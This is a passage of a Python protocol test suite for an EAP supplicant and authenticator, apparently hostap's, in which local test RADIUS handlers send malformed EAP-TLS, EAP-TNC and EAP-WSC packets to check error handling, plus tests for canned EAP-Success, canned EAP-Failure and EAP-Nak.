logger.info("Test: Invalid TLS message: no Flags octet included + workaround disabled")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_TLS)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TLS/Start")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TLS, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragmented TLS message (long; first)")
payload = 1450*'A'
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + len(payload),
EAP_TYPE_TLS, 0xc0, 65536) + payload
# "Too long TLS fragment (size over 64 kB)" on the last one
for i in range(44):
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragmented TLS message (long; cont %d)" % i)
eap_proto_tls_test_wait = True
payload = 1470*'A'
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_TYPE_TLS, 0x40) + payload
eap_proto_tls_test_wait = False
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TLS/Start")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TLS, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Non-ACK to more-fragment message")
return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 1,
EAP_TYPE_TLS, 0x00, 255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
logger.info("No more test responses available - test case completed")
global eap_proto_tls_test_done
eap_proto_tls_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(tls_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
i = 0
while not eap_proto_tls_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
workaround = "0" if i == 6 else "1"
fragment_size = "100" if i == 8 else "1400"
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="TLS", identity="tls user",
ca_cert="auth_serv/ca.pem",
client_cert="auth_serv/user.pem",
private_key="auth_serv/user.key",
eap_workaround=workaround,
fragment_size=fragment_size,
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD",
"CTRL-EVENT-EAP-STATUS"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
time.sleep(0.1)
start = os.times()[4]
while eap_proto_tls_test_wait:
now = os.times()[4]
if now - start > 10:
break
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_tnc(dev, apdev):
"""EAP-TNC protocol tests"""
check_eap_capa(dev[0], "TNC")
global eap_proto_tnc_test_done
eap_proto_tnc_test_done = False
def tnc_handler(ctx, req):
logger.info("tnc_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNC start with unsupported version")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNC without Flags field")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_TNC)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Message underflow due to missing Message Length")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0xa1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid Message Length")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_TNC, 0xa1, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid Message Length")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_TNC, 0xe1, 75001)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Start with Message Length")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_TNC, 0xa1, 1)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Server used start flag again")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragmentation and unexpected payload in ack")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x01)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 1,
EAP_TYPE_TNC, 0x01, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Server fragmenting and fragment overflow")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_TNC, 0xe1, 2, 1)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_TNC, 0x01, 2, 3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Server fragmenting and no message length in a fragment")
return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 1,
EAP_TYPE_TNC, 0x61, 2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNC start followed by invalid TNCCS-Batch")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "FOO"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNC start followed by invalid TNCCS-Batch (2)")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "</TNCCS-Batch><TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNCCS-Batch missing BatchId attribute")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch foo=3></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected IF-TNCCS BatchId")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=123456789></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing IMC-IMV-Message and TNCC-TNCS-Message end tags")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><IMC-IMV-Message><TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing IMC-IMV-Message and TNCC-TNCS-Message Type")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><IMC-IMV-Message></IMC-IMV-Message><TNCC-TNCS-Message></TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing TNCC-TNCS-Message XML end tag")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><XML></TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing TNCC-TNCS-Message Base64 start tag")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type></TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing TNCC-TNCS-Message Base64 end tag")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><Base64>abc</TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNCC-TNCS-Message Base64 message")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><Base64>aGVsbG8=</Base64></TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid TNCC-TNCS-Message XML message")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><XML>hello</XML></TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing TNCCS-Recommendation type")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = '<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><XML><TNCCS-Recommendation foo=1></TNCCS-Recommendation></XML></TNCC-TNCS-Message></TNCCS-Batch>'
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNCCS-Recommendation type=none")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = '<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><XML><TNCCS-Recommendation type="none"></TNCCS-Recommendation></XML></TNCC-TNCS-Message></TNCCS-Batch>'
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNCCS-Recommendation type=isolate")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = '<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><XML><TNCCS-Recommendation type="isolate"></TNCCS-Recommendation></XML></TNCC-TNCS-Message></TNCCS-Batch>'
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
logger.info("No more test responses available - test case completed")
global eap_proto_tnc_test_done
eap_proto_tnc_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(tnc_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
i = 0
while not eap_proto_tnc_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
frag = 1400
if i == 8:
frag = 150
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="TNC", identity="tnc", fragment_size=str(frag),
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD",
"CTRL-EVENT-EAP-STATUS"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_canned_success_after_identity(dev, apdev):
"""EAP protocol tests for canned EAP-Success after identity"""
check_eap_capa(dev[0], "MD5")
def eap_canned_success_handler(ctx, req):
logger.info("eap_canned_success_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
return None
srv = start_radius_server(eap_canned_success_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
phase1="allow_canned_success=1",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=0.1)
if ev is not None:
raise Exception("Unexpected EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
finally:
stop_radius_server(srv)
def test_eap_proto_wsc(dev, apdev):
"""EAP-WSC protocol tests"""
global eap_proto_wsc_test_done, eap_proto_wsc_wait_failure
eap_proto_wsc_test_done = False
def wsc_handler(ctx, req):
logger.info("wsc_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
global eap_proto_wsc_wait_failure
eap_proto_wsc_wait_failure = False
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing Flags field")
return struct.pack(">BBHB3BLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 1,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Message underflow (missing Message Length field)")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x02)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid Message Length (> 50000)")
return struct.pack(">BBHB3BLBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 4,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x02, 65535)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid Message Length (< current payload)")
return struct.pack(">BBHB3BLBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 5,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x02, 0, 0xff)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Op-Code 5 in WAIT_START state")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
5, 0x00)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid WSC Start to start the sequence")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x00)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No Message Length field in a fragmented packet")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
4, 0x01)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid WSC Start to start the sequence")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x00)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first fragmented packet")
return struct.pack(">BBHB3BLBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 5,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
4, 0x03, 10, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Op-Code 5 in fragment (expected 4)")
return struct.pack(">BBHB3BLBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 3,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
5, 0x01, 2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid WSC Start to start the sequence")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x00)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first fragmented packet")
return struct.pack(">BBHB3BLBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 5,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
4, 0x03, 2, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragment overflow")
return struct.pack(">BBHB3BLBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 4,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
4, 0x01, 2, 3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid WSC Start to start the sequence")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x00)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Op-Code 5 in WAIT_FRAG_ACK state")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
5, 0x00)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid WSC Start")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x00)
idx += 1
if ctx['num'] == idx:
logger.info("No more test responses available - test case completed")
global eap_proto_wsc_test_done
eap_proto_wsc_test_done = True
eap_proto_wsc_wait_failure = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(wsc_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
i = 0
while not eap_proto_wsc_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
fragment_size = 1398 if i != 9 else 50
dev[0].connect("eap-test", key_mgmt="WPA-EAP", eap="WSC",
fragment_size=str(fragment_size),
identity="WFA-SimpleConfig-Enrollee-1-0",
phase1="pin=12345670",
scan_freq="2412", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
if eap_proto_wsc_wait_failure:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP failure")
else:
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_canned_success_before_method(dev, apdev):
"""EAP protocol tests for canned EAP-Success before any method"""
params = int_eap_server_params()
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
hapd.request("SET ext_eapol_frame_io 1")
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
phase1="allow_canned_success=1",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX from hostapd")
res = dev[0].request("EAPOL_RX " + bssid + " 0200000403020004")
if "OK" not in res:
raise Exception("EAPOL_RX to wpa_supplicant failed")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_canned_failure_before_method(dev, apdev):
"""EAP protocol tests for canned EAP-Failure before any method"""
params = int_eap_server_params()
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
hapd.request("SET ext_eapol_frame_io 1")
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
phase1="allow_canned_success=1",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX from hostapd")
res = dev[0].request("EAPOL_RX " + bssid + " 0200000404020004")
if "OK" not in res:
raise Exception("EAPOL_RX to wpa_supplicant failed")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_nak_oom(dev, apdev):
"""EAP-Nak OOM"""
check_eap_capa(dev[0], "MD5")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_sm_buildNak"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="sake user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_nak_expanded(dev, apdev):
"""EAP-Nak with expanded method"""
check_eap_capa(dev[0], "MD5")
check_eap_capa(dev[0], "VENDOR-TEST")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="VENDOR-TEST WSC",
identity="sake user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=10)
if ev is None or "NAK" not in ev:
raise Exception("No NAK event seen")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP-Failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
EAP_TLV_RESULT_TLV = 3
EAP_TLV_NAK_TLV = 4
EAP_TLV_ERROR_CODE_TLV = 5
EAP_TLV_CONNECTION_BINDING_TLV = 6
EAP_TLV_VENDOR_SPECIFIC_TLV = 7
EAP_TLV_URI_TLV = 8
EAP_TLV_EAP_PAYLOAD_TLV = 9
EAP_TLV_INTERMEDIATE_RESULT_TLV = 10
EAP_TLV_PAC_TLV = 11
EAP_TLV_CRYPTO_BINDING_TLV = 12
EAP_TLV_CALLING_STATION_ID_TLV = 13
EAP_TLV_CALLED_STATION_ID_TLV = 14
EAP_TLV_NAS_PORT_TYPE_TLV = 15
EAP_TLV_SERVER_IDENTIFIER_TLV = 16
EAP_TLV_IDENTITY_TYPE_TLV = 17
EAP_TLV_SERVER_TRUSTED_ROOT_TLV = 18
EAP_TLV_REQUEST_ACTION_TLV = 19
EAP_TLV_PKCS7_TLV = 20
EAP_TLV_RESULT_SUCCESS = 1
EAP_TLV_RESULT_FAILURE = 2
EAP_TLV_TYPE_MANDATORY = 0x8000
EAP_TLV_TYPE_MASK = 0x3fff
PAC_TYPE_PAC_KEY = 1
PAC_TYPE_PAC_OPAQUE = 2
PAC_TYPE_CRED_LIFETIME = 3
PAC_TYPE_A_ID = 4
PAC_TYPE_I_ID = 5
PAC_TYPE_A_ID_INFO = 7
PAC_TYPE_PAC_ACKNOWLEDGEMENT = 8
PAC_TYPE_PAC_INFO = 9
PAC_TYPE_PAC_TYPE = 10
def eap_fast_start(ctx):
logger.info("Send EAP-FAST/Start")
